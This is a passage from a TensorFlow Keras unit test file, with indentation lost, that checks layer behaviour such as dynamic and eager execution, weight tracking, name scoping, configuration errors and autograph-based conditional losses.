self.assertEqual(model.run_eagerly, True)
model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))
@combinations.generate(combinations.keras_model_type_combinations())
def test_dynamic_layer_error(self):
with self.assertRaisesRegexp(TypeError,
'attempting to use Python control flow'):
model = testing_utils.get_model_from_layers([DynamicLayer()],
input_shape=(3,))
model.compile(rmsprop.RMSprop(0.001), loss='mse')
model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))
@combinations.generate(combinations.keras_model_type_combinations())
def test_dynamic_layer_error_running_in_graph_mode(self):
with ops.get_default_graph().as_default():
model = testing_utils.get_model_from_layers([DynamicLayer(dynamic=True)],
input_shape=(3,))
self.assertEqual(model.dynamic, True)
# But then you cannot run the model since you're in a graph scope.
with self.assertRaisesRegexp(
ValueError, 'You must enable eager execution'):
model.compile(rmsprop.RMSprop(0.001), loss='mse')
def test_manual_compute_output_shape(self):
class BuildCounter(base_layer.Layer):
def __init__(self, *args, **kwargs): # pylint: disable=redefined-outer-name
super(BuildCounter, self).__init__(*args, **kwargs)
self.build_counter = 0
def build(self, input_shape):
self.build_counter += 1
self.build_shape = input_shape
def call(self, inputs):
return inputs
layer = BuildCounter(dtype=dtypes.float64)
output_shape = layer.compute_output_shape((None, 10))
self.assertEqual(layer.build_counter, 1)
self.assertEqual(layer.build_shape.as_list(), [None, 10])
self.assertEqual(output_shape.as_list(), [None, 10])
output_signature = layer.compute_output_signature(
tensor_spec.TensorSpec(dtype=dtypes.float64, shape=[None, 10]))
self.assertEqual(layer.build_counter, 1)
self.assertEqual(layer.build_shape.as_list(), [None, 10])
self.assertEqual(output_signature.dtype, dtypes.float64)
self.assertEqual(output_signature.shape.as_list(), [None, 10])
layer(np.ones((5, 10)))
self.assertEqual(layer.build_counter, 1)
self.assertEqual(layer.build_shape.as_list(), [None, 10])
def test_eager_switch_case_input(self):
task = input_layer.Input(shape=(), dtype=dtypes.int32)
control_flow_ops.switch_case(
task[0], [lambda: constant_op.constant(1.0) for _ in range(10)])
def test_dynamic_layer_with_deferred_sequential_model(self):
model = sequential.Sequential([DynamicLayer(dynamic=True), layers.Dense(3)])
self.assertEqual(model.dynamic, True)
model.compile(rmsprop.RMSprop(0.001), loss='mse')
self.assertEqual(model.run_eagerly, True)
model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))
def test_nested_dynamic_layers_in_eager_mode(self):
inputs = input_layer.Input((3,))
outputs = DynamicLayer(dynamic=True)(inputs)
inner_model = training_lib.Model(inputs, outputs)
self.assertEqual(inner_model.dynamic, True)
inputs = input_layer.Input((3,))
x = DynamicLayer(dynamic=True)(inputs)
outputs = inner_model(x)
model = training_lib.Model(inputs, outputs)
self.assertEqual(model.dynamic, True)
model.compile(rmsprop.RMSprop(0.001), loss='mse')
self.assertEqual(model.run_eagerly, True)
model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))
def test_dynamic_subclassed_model_no_shape_inference(self):
class MyModel(training_lib.Model):
def __init__(self):
super(MyModel, self).__init__(dynamic=True)
self.layer1 = layers.Dense(3)
self.layer2 = layers.Dense(3)
def call(self, inputs):
if math_ops.reduce_sum(inputs) > 0:
return self.layer1(inputs)
else:
return self.layer2(inputs)
model = MyModel()
self.assertEqual(model.dynamic, True)
model.compile(rmsprop.RMSprop(0.001), loss='mse')
self.assertEqual(model.run_eagerly, True)
model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))
self.assertEqual(model.outputs, None)
def test_dynamic_subclassed_model_with_shape_inference(self):
class MyModel(training_lib.Model):
def __init__(self):
super(MyModel, self).__init__(dynamic=True)
self.layer1 = layers.Dense(3)
self.layer2 = layers.Dense(3)
def call(self, inputs):
if math_ops.reduce_sum(inputs) > 0:
return self.layer1(inputs)
else:
return self.layer2(inputs)
def compute_output_shape(self, input_shape):
return tuple(input_shape[:-1].as_list()) + (3,)
model = MyModel()
self.assertEqual(model.dynamic, True)
model.compile(rmsprop.RMSprop(0.001), loss='mse')
x, y = np.random.random((2, 3)), np.random.random((2, 3))
model.train_on_batch(x, y)
outputs = model(x)
self.assertEqual(outputs.shape.as_list(), [2, 3])
def test_deepcopy(self):
bias_reg = lambda x: 1e-3 * math_ops.reduce_sum(x)
layer = layers.Conv2D(32, (3, 3), bias_regularizer=bias_reg)
# Call the Layer on data to generate regularize losses.
layer(array_ops.ones((1, 10, 10, 3)))
self.assertLen(layer.losses, 1)
new_layer = copy.deepcopy(layer)
self.assertEqual(new_layer.bias_regularizer, bias_reg)
self.assertEqual(layer.get_config(), new_layer.get_config())
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_invalid_forward_pass(self):
inputs = input_layer.Input((3,))
with self.assertRaisesRegexp(ValueError, 'You did something wrong!'):
_ = InvalidLayer()(inputs)
def test_no_legacy_model(self):
inputs = input_layer.Input((1,))
legacy_dense_0 = legacy_core.Dense(1, name='legacy_dense_0')
legacy_dense_1 = legacy_core.Dense(1, name='legacy_dense_1')
layer = legacy_dense_0(inputs)
layer = layers.Dense(1)(layer)
layer = legacy_dense_1(layer)
expected_regex = (r'The following are legacy tf\.layers\.Layers:\n '
'{}\n {}'.format(legacy_dense_0, legacy_dense_1))
with self.assertRaisesRegexp(TypeError, expected_regex):
_ = training_lib.Model(inputs=[inputs], outputs=[layer])
model = training_lib.Model(inputs=[inputs], outputs=[inputs])
with self.assertRaisesRegexp(TypeError, expected_regex):
model._insert_layers([legacy_dense_0, legacy_dense_1])
def test_no_legacy_sequential(self):
layer = [layers.Dense(1), legacy_core.Dense(1, name='legacy_dense_0')]
expected_regex = r'legacy tf\.layers\.Layers:\n {}'.format(layer[1])
with self.assertRaisesRegexp(TypeError, expected_regex):
_ = sequential.Sequential(layer)
with self.assertRaisesRegexp(TypeError, expected_regex):
_ = sequential.Sequential([input_layer.Input(shape=(4,))] + layer)
model = sequential.Sequential()
with self.assertRaisesRegexp(TypeError, expected_regex):
for l in layer:
model.add(l)
@combinations.generate(
combinations.times(
combinations.keras_model_type_combinations(),
combinations.combine(mode=['graph', 'eager'])))
def test_build_with_numpy_data(self):
model_layers = [
layers.Dense(3, activation='relu', kernel_initializer='ones'),
layers.Dense(1, activation='sigmoid', kernel_initializer='ones')
]
model = testing_utils.get_model_from_layers(model_layers, input_shape=(4,))
model(np.zeros((2, 4), dtype='float32'))
self.assertTrue(model.built)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_default_add_weight(self):
class TestLayer(base_layer.Layer):
def __init__(self):
super(TestLayer, self).__init__()
self.default_weight = self.add_weight()
self.weight_without_name = self.add_weight(shape=(3, 4))
self.regularized_weight_without_name = self.add_weight(
shape=(3, 4), regularizer='l2')
layer = TestLayer()
self.assertEqual(layer.default_weight.shape.as_list(), [])
self.assertEqual(layer.weight_without_name.shape.as_list(), [3, 4])
self.assertEqual(layer.default_weight.dtype.name, 'float32')
self.assertEqual(layer.weight_without_name.dtype.name, 'float32')
self.assertEqual(len(layer.losses), 1)
if not context.executing_eagerly():
# Cannot access tensor.name in eager execution.
self.assertIn('Variable_2/Regularizer', layer.losses[0].name)
@combinations.generate(combinations.keras_mode_combinations(mode=['eager']))
def test_learning_phase_freezing_for_layers(self):
class LearningPhaseLayer(base_layer.Layer):
def call(self, inputs):
return backend.in_train_phase(lambda: array_ops.ones_like(inputs),
lambda: array_ops.zeros_like(inputs))
def get_learning_phase_value():
model = sequential.Sequential([LearningPhaseLayer(input_shape=(1,))])
model._run_eagerly = testing_utils.should_run_eagerly()
return np.sum(model(np.ones((1, 1))))
self.assertEqual(get_learning_phase_value(), 0)
# Test scope.
with backend.learning_phase_scope(1):
self.assertEqual(get_learning_phase_value(), 1)
# The effects of the scope end after exiting it.
self.assertEqual(get_learning_phase_value(), 0)
# Test setting.
backend.set_learning_phase(1)
self.assertEqual(get_learning_phase_value(), 1)
backend.set_learning_phase(0)
self.assertEqual(get_learning_phase_value(), 0)
# Cannot be enabled with `run_eagerly=True`, see b/123904578
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_layer_can_return_variable(self):
class ComputeSum(base_layer.Layer):
def __init__(self):
super(ComputeSum, self).__init__()
self.total = variables.Variable(
initial_value=array_ops.zeros((1, 1)), trainable=False)
if not context.executing_eagerly():
backend.get_session().run(self.total.initializer)
def call(self, inputs):
self.total.assign_add(inputs)
return self.total
inputs = input_layer.Input(shape=(1,))
model = training_lib.Model(inputs, ComputeSum()(inputs))
model.predict(np.ones((1, 1)))
def _get_layer_with_training_arg(self):
class TrainingLayer(base_layer.Layer):
"""A layer with a `training` argument in a defuned `call`."""
@def_function.function
def call(self, inputs, training=None):
if training is None:
training = backend.learning_phase()
return tf_utils.smart_cond(training,
lambda: array_ops.ones_like(inputs),
lambda: array_ops.zeros_like(inputs))
return TrainingLayer()
# b/124459427: can't test with `run_eagerly=True` for now.
@combinations.generate(
combinations.times(combinations.keras_mode_combinations(),
combinations.keras_model_type_combinations()))
def test_training_arg_in_defun(self):
layer = self._get_layer_with_training_arg()
model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
model.compile(rmsprop.RMSprop(0.),
loss='mae')
history = model.fit(np.zeros((1, 1)), np.zeros((1, 1)))
self.assertEqual(history.history['loss'][0], 1.)
loss = model.evaluate(np.zeros((1, 1)), np.zeros((1, 1)))
self.assertEqual(loss, 0.)
# Test that the argument injection performed in `call` is not active
# when the argument is passed explicitly.
layer = self._get_layer_with_training_arg()
inputs = input_layer.Input(shape=(1,))
# Pass `training` by name
outputs = layer(inputs, training=False)
model = training_lib.Model(inputs, outputs)
model.compile(rmsprop.RMSprop(0.),
loss='mae')
history = model.fit(np.zeros((1, 1)), np.zeros((1, 1)))
self.assertEqual(history.history['loss'][0], 0.)
@combinations.generate(
combinations.times(combinations.keras_mode_combinations(),
combinations.keras_model_type_combinations()))
def test_raw_variable_assignment(self):
class RawVariableLayer(base_layer.Layer):
def __init__(self, **kwargs):
super(RawVariableLayer, self).__init__(**kwargs)
# Test variables in nested structure.
self.var_list = [variables.Variable(1.), {'a': variables.Variable(2.)}]
def call(self, inputs):
return inputs * self.var_list[0] * self.var_list[1]['a']
model = testing_utils.get_model_from_layers([RawVariableLayer()],
input_shape=(10,))
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
# Checks that variables get initialized.
model.fit(x, y, batch_size=2, epochs=2)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_layer_names(self):
inputs = input_layer.Input(shape=[2])
add1 = inputs + inputs
add2 = layers.Add()([inputs, inputs])
add3 = inputs + inputs
add4 = layers.Add()([inputs, inputs])
model = training_lib.Model(inputs=[inputs],
outputs=[add1, add2, add3, add4])
actual_names = [l.name for l in model.layers]
graph_names = [
'input_1', 'tf_op_layer_AddV2', 'add', 'tf_op_layer_AddV2_1', 'add_1'
]
eager_names = [
'input_1', 'tf_op_layer_add', 'add', 'tf_op_layer_add_2', 'add_1'
]
for actual, eager, graph in zip(actual_names, graph_names, eager_names):
self.assertIn(actual, {eager, graph})
def test_add_trainable_weight_on_frozen_layer(self):
class TestLayer(base_layer.Layer):
def build(self, input_shape):
self.w = self.add_weight(shape=(), trainable=True)
def call(self, inputs):
return self.w * inputs
layer = TestLayer()
layer.trainable = False
layer.build(None)
layer.trainable = True
self.assertListEqual(layer.trainable_weights, [layer.w])
@combinations.generate(
combinations.times(combinations.keras_mode_combinations(),
combinations.keras_model_type_combinations()))
def test_passing_initial_weights_values(self):
kernel_value = np.random.random((10, 2))
layer_with_weights = layers.Dense(2, use_bias=False, weights=[kernel_value])
model = testing_utils.get_model_from_layers([layer_with_weights],
input_shape=(10,))
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.random.random((3, 10))
out = model.predict(inputs)
self.assertAllClose(model.layers[-1].get_weights()[0], kernel_value)
self.assertAllClose(out, np.dot(inputs, kernel_value))
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_set_weights_and_get_weights(self):
layer = layers.Dense(2)
layer.build((None, 10))
kernel = np.random.random((10, 2))
bias = np.random.random((2,))
layer.set_weights([kernel, bias])
weights = layer.get_weights()
self.assertEqual(len(weights), 2)
self.assertAllClose(weights[0], kernel)
self.assertAllClose(weights[1], bias)
with self.assertRaisesRegexp(
ValueError, 'but the layer was expecting 2 weights'):
layer.set_weights([1, 2, 3])
with self.assertRaisesRegexp(
ValueError, 'not compatible with provided weight shape'):
layer.set_weights([kernel.T, bias])
def test_get_config_error(self):
class MyLayer(base_layer.Layer):
def __init__(self, my_kwarg='default', **kwargs):
super(MyLayer, self).__init__(**kwargs)
self.my_kwarg = my_kwarg
# `__init__` includes kwargs but `get_config` is not overridden, so
# an error should be thrown:
with self.assertRaisesRegexp(NotImplementedError, 'Layer MyLayer has'):
MyLayer('custom').get_config()
class MyLayerNew(base_layer.Layer):
def __init__(self, my_kwarg='default', **kwargs):
super(MyLayerNew, self).__init__(**kwargs)
self.my_kwarg = my_kwarg
def get_config(self):
config = super(MyLayerNew, self).get_config()
config['my_kwarg'] = self.my_kwarg
return config
# Test to make sure that error is not raised if the method call is
# from an overridden `get_config`:
self.assertEqual(MyLayerNew('custom').get_config()['my_kwarg'], 'custom')
class MyLayerNew2(base_layer.Layer):
def __init__(self, name='MyLayerName', dtype=None, **kwargs): # pylint:disable=redefined-outer-name
super(MyLayerNew2, self).__init__(name=name, dtype=dtype, **kwargs)
# Check that if the kwargs in `__init__` are base layer constructor
# arguments, no error is thrown:
self.assertEqual(MyLayerNew2(name='New').get_config()['name'], 'New')
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_count_params(self):
dense = layers.Dense(16)
dense.build((None, 4))
self.assertEqual(dense.count_params(), 16 * 4 + 16)
dense = layers.Dense(16)
with self.assertRaisesRegexp(ValueError, 'call `count_params`'):
dense.count_params()
model = sequential.Sequential(layers.Dense(16))
with self.assertRaisesRegexp(ValueError, 'call `count_params`'):
model.count_params()
dense = layers.Dense(16, input_dim=4)
model = sequential.Sequential(dense)
self.assertEqual(model.count_params(), 16 * 4 + 16)
def test_super_not_called(self):
class CustomLayerNotCallingSuper(base_layer.Layer):
def __init__(self):
pass
layer = CustomLayerNotCallingSuper()
with self.assertRaisesRegexp(RuntimeError, 'You must call `super()'):
layer(np.random.random((10, 2)))
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_first_arg_not_called_inputs(self):
x, y = array_ops.ones((10, 1)), array_ops.ones((10, 1))
class ArgLayer(base_layer.Layer):
def call(self, x, y):
return x + y
layer = ArgLayer()
out = self.evaluate(layer(x=x, y=y))
self.assertAllClose(out, 2 * np.ones((10, 1)))
class KwargLayer(base_layer.Layer):
def call(self, x=None, y=None):
return x + y
layer = KwargLayer()
out = self.evaluate(layer(x=x, y=y))
self.assertAllClose(out, 2 * np.ones((10, 1)))
with self.assertRaisesRegexp(ValueError, 'must always be passed'):
layer(y=y)
class TFFunctionLayer(base_layer.Layer):
@def_function.function
def call(self, x, y=None):
if y is None:
return x
return x + y
layer = TFFunctionLayer()
out = self.evaluate(layer(x=x, y=y))
self.assertAllClose(out, 2 * np.ones((10, 1)))
def test_build_input_shape(self):
class CustomLayer(base_layer.Layer):
def build(self, input_shape):
self.add_weight('w', shape=input_shape[1:])
super(CustomLayer, self).build(input_shape)
layer = CustomLayer()
self.assertFalse(layer.built)
layer.build([None, 1, 2, 3])
self.assertTrue(layer.built)
self.assertEqual([None, 1, 2, 3], layer._build_input_shape)
layer = CustomLayer()
layer(input_layer.Input((3,)))
self.assertTrue(layer.built)
self.assertEqual([None, 3], layer._build_input_shape.as_list())
class SymbolicSupportTest(keras_parameterized.TestCase):
def test_using_symbolic_tensors_with_tf_ops(self):
# Single-input.
x = input_layer.Input((3,))
y = math_ops.square(x)
self.assertEqual(y.graph, backend.get_graph())
# Multi-inputs.
x1, x2 = input_layer.Input((3,)), input_layer.Input((3,))
y = array_ops.concat([x1, x2], axis=1)
self.assertEqual(y.graph, backend.get_graph())
# Mixing Keras symbolic tensors and graph tensors from the same graph works.
with backend.get_graph().as_default():
x1 = input_layer.Input((3,))
x2 = input_layer.Input((3,))
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
# Creating same op type (matmul) multiple times in the Keras graph works.
x1 = input_layer.Input((3,))
x2 = input_layer.Input((3,))
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
def test_mixing_eager_and_graph_tensors(self):
with ops.Graph().as_default():
x1 = array_ops.ones((3, 3))
x2 = array_ops.ones((3, 3))
self.assertIsInstance(x2, ops.EagerTensor)
with self.assertRaisesRegexp(TypeError, 'Graph tensors'):
math_ops.matmul(x1, x2)
def test_mixing_numpy_arrays_and_graph_tensors(self):
with ops.Graph().as_default():
x1 = array_ops.ones((3, 3))
x2 = np.ones((3, 3), dtype='float32')
with self.assertRaisesRegexp(TypeError, 'Graph tensors'):
math_ops.matmul(x1, x2)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_mixing_keras_symbolic_tensors_and_eager_tensors(self):
x1 = input_layer.Input((3,))
x2 = array_ops.ones((3, 3))
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
fn = backend.function(inputs=[x1], outputs=[y])
x_val = np.random.random((3, 3))
y_val = np.ones((3, 3))
self.assertAllClose(fn([x_val])[0],
np.matmul(x_val, y_val),
atol=1e-5)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_mixing_keras_symbolic_tensors_and_numpy_arrays(self):
x1 = input_layer.Input((3,))
x2 = np.ones((3, 3), dtype='float32')
y = math_ops.matmul(x1, x2)
self.assertEqual(y.graph, backend.get_graph())
fn = backend.function(inputs=[x1], outputs=[y])
x_val = np.random.random((3, 3))
y_val = np.ones((3, 3))
self.assertAllClose(fn([x_val])[0],
np.matmul(x_val, y_val),
atol=1e-5)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_reraising_exception(self):
# When layer is not dynamic, we have some pattern matching during exception
# handling to detect when the user is trying to use python control flow.
# When an exception is thrown but the pattern doesn't match, we want to
# preserve the originating stack trace. An early implementation of this
# logic lost the stack trace. We test the correct behavior here.
class TypeErrorLayer(base_layer.Layer):
def call(self, inputs):
def easily_identifiable_name():
raise TypeError('Non-matching TypeError message.')
easily_identifiable_name()
inputs = input_layer.Input((3,))
try:
_ = TypeErrorLayer()(inputs)
except TypeError as e:
if hasattr(e, 'ag_error_metadata'):
self.assertIn('easily_identifiable_name', str(e))
# See ErrorMetadataBase in autograph/pyct/errors.py
function_name = e.ag_error_metadata.translated_stack[-1].function_name
else:
tb = traceback.extract_tb(sys.exc_info()[2])
last_entry = tb[-1]
function_name = last_entry[2]
self.assertEqual(function_name, 'easily_identifiable_name')
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_summaries_in_tf_function(self):
if not context.executing_eagerly():
return
class MyLayer(base_layer.Layer):
def call(self, inputs):
summary_ops_v2.scalar('mean', math_ops.reduce_mean(inputs))
return inputs
tmp_dir = self.get_temp_dir()
writer = summary_ops_v2.create_file_writer_v2(tmp_dir)
with writer.as_default(), summary_ops_v2.always_record_summaries():
my_layer = MyLayer()
x = array_ops.ones((10, 10))
def my_fn(x):
return my_layer(x)
_ = my_fn(x)
event_file = gfile.Glob(os.path.join(tmp_dir, 'events*'))
self.assertLen(event_file, 1)
event_file = event_file[0]
tags = set()
for e in summary_iterator.summary_iterator(event_file):
for val in e.summary.value:
tags.add(val.tag)
self.assertEqual(set(['my_layer/mean']), tags)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
class NestedTrackingTest(test.TestCase):
def test_nested_layer_variable_tracking(self):
# Test that variables from nested sublayers are
# being tracked by subclassed layers.
class MyLayer(base_layer.Layer):
def __init__(self):
super(MyLayer, self).__init__()
self.dense1 = layers.Dense(1)
self.dense2 = layers.BatchNormalization()
def build(self, input_shape):
self.v1 = self.add_weight('v1', shape=input_shape[1:].as_list())
self.v2 = variables.Variable(
name='v2',
initial_value=np.zeros(input_shape[1:].as_list(), dtype='float32'),
trainable=False)
def call(self, inputs):
x = self.dense1(inputs) + self.dense2(inputs)
return x + self.v1 + self.v2
layer = MyLayer()
inputs = input_layer.Input((1,))
_ = layer(inputs)
self.assertEqual(len(layer.weights), 8)
self.assertEqual(len(layer.trainable_weights), 5)
self.assertEqual(len(layer.non_trainable_weights), 3)
layer.dense1.trainable = False
self.assertEqual(len(layer.weights), 8)
self.assertEqual(len(layer.trainable_weights), 3)
self.assertEqual(len(layer.non_trainable_weights), 5)
layer.trainable = False
self.assertEqual(len(layer.weights), 8)
self.assertEqual(len(layer.trainable_weights), 0)
self.assertEqual(len(layer.non_trainable_weights), 8)
self.assertEqual(
{id(v) for v in [layer.dense1, layer.dense2, layer.v1, layer.v2]},
{id(v) for _, v in layer._checkpoint_dependencies})
def test_nested_layer_updates_losses_tracking(self):
# Test that updates and losses from nested sublayers are
# being tracked by subclassed layers.
class UpdateAndLossLayer(base_layer.Layer):
def build(self, _):
self.v1 = self.add_weight('v1', shape=())
def call(self, inputs):
self.add_loss(math_ops.reduce_sum(inputs))
self.add_update(state_ops.assign_add(self.v1, 1))
return inputs + 1
class MyLayer(base_layer.Layer):
def build(self, _):
self.v1 = self.add_weight('v1', shape=())
def __init__(self):
super(MyLayer, self).__init__()
self.ul1 = UpdateAndLossLayer()
self.ul2 = UpdateAndLossLayer()
def call(self, inputs):
self.add_loss(math_ops.reduce_sum(inputs))
self.add_update(state_ops.assign_add(self.v1, 1))
x = self.ul1(inputs)
return self.ul2(x)
layer = MyLayer()
if context.executing_eagerly():
inputs = array_ops.ones((3, 1))
_ = layer(inputs)
self.assertEqual(len(layer.losses), 3)
self.assertLen(layer.get_losses_for(None), 3)
else:
inputs = input_layer.Input((1,))
_ = layer(inputs)
self.assertEqual(len(layer.losses), 3)
self.assertEqual(len(layer.updates), 3)
self.assertLen(layer.get_losses_for(None), 3)
def test_attribute_reassignment(self):
l = base_layer.Layer()
l.a = base_layer.Layer()
l.a = []
l.a = variables.Variable(1.)
l.a = base_layer.Layer()
last_assignment = base_layer.Layer()
l.a = last_assignment
l.b = variables.Variable(1.)
del l.b
l.c = base_layer.Layer()
del l.c
l.d = last_assignment
del l.d
self.assertEqual([last_assignment], l._layers)
self.assertEqual([], l.trainable_weights)
self.assertEqual([], l.non_trainable_weights)
self.assertEqual([], l.weights)
del l.a
self.assertEqual([], l._layers)
def test_assign_op_not_tracked_as_variable(self):
class LayerWithAssignAttr(base_layer.Layer):
def build(self, input_shape):
self.v = variables.Variable(1.)
self.v_assign = self.v.assign_add(2.)
layer = LayerWithAssignAttr()
layer.build((10, 10))
self.assertEqual([layer.v], layer.variables)
def test_layer_class_not_tracked_as_sublayer(self):
# See https://github.com/tensorflow/tensorflow/issues/27431 for details.
class LayerWithClassAttribute(base_layer.Layer):
def __init__(self):
super(LayerWithClassAttribute, self).__init__()
self.layer_fn = layers.Dense
layer = LayerWithClassAttribute()
self.assertEmpty(layer.variables)
self.assertEmpty(layer.submodules)
def test_layer_call_fn_args(self):
class NonDefunLayer(base_layer.Layer):
def call(self, inputs, a, mask, b=None, training=None):
return inputs
class DefunLayer(base_layer.Layer):
@def_function.function
def call(self, x, mask, a, training=None, b=None):
return x
nondefun_layer = NonDefunLayer()
self.assertEqual(nondefun_layer._call_fn_args,
['inputs', 'a', 'mask', 'b', 'training'])
defun_layer = DefunLayer()
self.assertEqual(defun_layer._call_fn_args,
['x', 'mask', 'a', 'training', 'b'])
def test_sequential_model(self):
model = sequential.Sequential(
[layers.Dense(10, input_shape=(10,)),
layers.Dense(5)])
self.assertLen(model.layers, 2)
self.assertLen(model.weights, 4)
# Make sure a subclass model also works when it is called 'Sequential'.
class Sequential(training_lib.Model):
def __init__(self):
super(Sequential, self).__init__()
self.dense_layers = [layers.Dense(10), layers.Dense(5)]
def call(self, inputs):
x = inputs
for d in self.dense_layers:
x = d(x)
return x
s = Sequential()
self.assertLen(s.layers, 2)
self.assertLen(s.weights, 0)
s(input_layer.Input((10,)))
self.assertLen(s.weights, 4)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
class NameScopingTest(keras_parameterized.TestCase):
def test_name_scope_layer(self):
x = backend.placeholder(shape=(10, 10))
layer = layers.Dense(10, name='MyName')
layer(x)
self.assertEqual(layer.bias.name, 'MyName/bias:0')
self.assertEqual(layer.kernel.name, 'MyName/kernel:0')
def test_name_scope_functional_api(self):
inputs = input_layer.Input((3,))
layer = layers.Dense(10, name='MyName')
_ = layer(inputs)
self.assertEqual(layer.bias.name, 'MyName/bias:0')
self.assertEqual(layer.kernel.name, 'MyName/kernel:0')
def test_name_scope_functional_api_nested(self):
class NestedLayer(base_layer.Layer):
def __init__(self, name='OuterName'):
super(NestedLayer, self).__init__(name=name)
self.dense = layers.Dense(10, name='InnerName')
def call(self, inputs):
return self.dense(inputs)
inputs = input_layer.Input((3,))
layer = NestedLayer()
_ = layer(inputs)
self.assertEqual(layer.dense.bias.name, 'OuterName/InnerName/bias:0')
self.assertEqual(layer.dense.kernel.name, 'OuterName/InnerName/kernel:0')
def test_name_scope_sublayer(self):
class NameScopeTracker(base_layer.Layer):
def call(self, inputs):
self.active_name_scope = ops.get_name_scope()
return inputs
x = backend.placeholder(shape=(10, 10))
sublayer = NameScopeTracker(name='Sublayer')
layer = layers.Dense(10, activation=sublayer, name='MyName2')
layer(x)
self.assertEqual(layer.bias.name, 'MyName2/bias:0')
self.assertEqual(layer.kernel.name, 'MyName2/kernel:0')
self.assertEqual(sublayer.active_name_scope, 'MyName2/Sublayer')
def test_name_scope_tf_tensor(self):
x = ops.convert_to_tensor_v2(np.ones((10, 10)))
layer = layers.Dense(
10, activation=layers.ReLU(name='MyAct'), name='MyName3')
layer(x)
self.assertEqual(layer.bias.name, 'MyName3/bias:0')
self.assertEqual(layer.kernel.name, 'MyName3/kernel:0')
@combinations.generate(combinations.keras_mode_combinations(mode=['eager']))
class AutographControlFlowTest(keras_parameterized.TestCase):
def test_disabling_in_context_is_matched(self):
test_obj = self
class MyLayer(base_layer.Layer):
def call(self, inputs, training=None):
with test_obj.assertRaisesRegex(TypeError, 'Tensor.*as.*bool'):
if constant_op.constant(False):
return inputs * 1.
return inputs * 0.
@def_function.function(autograph=False)
def test_fn():
return MyLayer()(constant_op.constant([[1., 2., 3.]]))
test_fn()
def test_if_training_pattern_output(self):
class MyLayer(base_layer.Layer):
def call(self, inputs, training=None):
if training:
return inputs * 1.
return inputs * 0.
inputs = input_layer.Input((3,))
outputs = MyLayer()(inputs)
model = training_lib.Model(inputs, outputs)
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
train_loss = model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
self.assertEqual(train_loss, 0.)
test_loss = model.test_on_batch(np.ones((2, 3)), np.ones((2, 3)))
self.assertEqual(test_loss, 1.)
def test_if_training_pattern_loss(self):
class MyLayer(base_layer.Layer):
def call(self, inputs, training=None):
if training:
loss = math_ops.reduce_sum(inputs)
else:
loss = 0.
self.add_loss(loss)
return inputs
inputs = input_layer.Input((3,))
outputs = MyLayer()(inputs)
model = training_lib.Model(inputs, outputs)
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
train_loss = model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
self.assertEqual(train_loss, 2 * 3)
test_loss = model.test_on_batch(np.ones((2, 3)), np.ones((2, 3)))
self.assertEqual(test_loss, 0)
def test_if_training_pattern_metric(self):
class MyLayer(base_layer.Layer):
def call(self, inputs, training=None):
if training:
metric = math_ops.reduce_sum(inputs)
else:
metric = 0.
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
inputs = input_layer.Input((3,))
outputs = MyLayer()(inputs)
model = training_lib.Model(inputs, outputs)
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
for _ in range(3):
_, train_metric = model.train_on_batch(np.ones((2, 3)),
np.ones((2, 3)))
self.assertEqual(train_metric, 2 * 3)
_, test_metric = model.test_on_batch(np.ones((2, 3)),
np.ones((2, 3)))
self.assertEqual(test_metric, 0)
def test_if_training_pattern_update(self):
class MyLayer(base_layer.Layer):
def build(self, input_shape):
self.counter = self.add_weight(
shape=(), trainable=False, initializer='zeros')
def call(self, inputs, training=None):
if training:
increment = 1.
else:
increment = 0.
self.counter.assign_add(increment)
return inputs
inputs = input_layer.Input((3,))
layer = MyLayer()
outputs = layer(inputs)
model = training_lib.Model(inputs, outputs)
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
self.assertEqual(backend.get_value(layer.counter), 1.)
def test_conditional_losses_in_call(self):
class MyLayer(base_layer.Layer):
def __init__(self):
super(MyLayer,
self).__init__(dynamic=testing_utils.should_run_eagerly())
def call(self, inputs, training=None):
if training:
self.add_loss(math_ops.reduce_sum(inputs))
return inputs
def compute_output_shape(self, input_shape):
return input_shape
inputs = input_layer.Input((3,))
layer = MyLayer()
outputs = layer(inputs)
model = training_lib.Model(inputs, outputs)
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
self.assertEqual(loss, 2 * 3)
def test_conditional_callable_losses(self):
model = sequential.Sequential([
layers.Dense(
1, kernel_regularizer=regularizers.l2(1e-4), input_shape=(1,))
])
model._run_eagerly = testing_utils.should_run_eagerly()
def assert_graph(t):
if not context.executing_eagerly():
self.assertEqual(t.graph, ops.get_default_graph())
@def_function.function
def get_losses(t):
if t < 0:
return math_ops.reduce_sum(model.losses) * t
else:
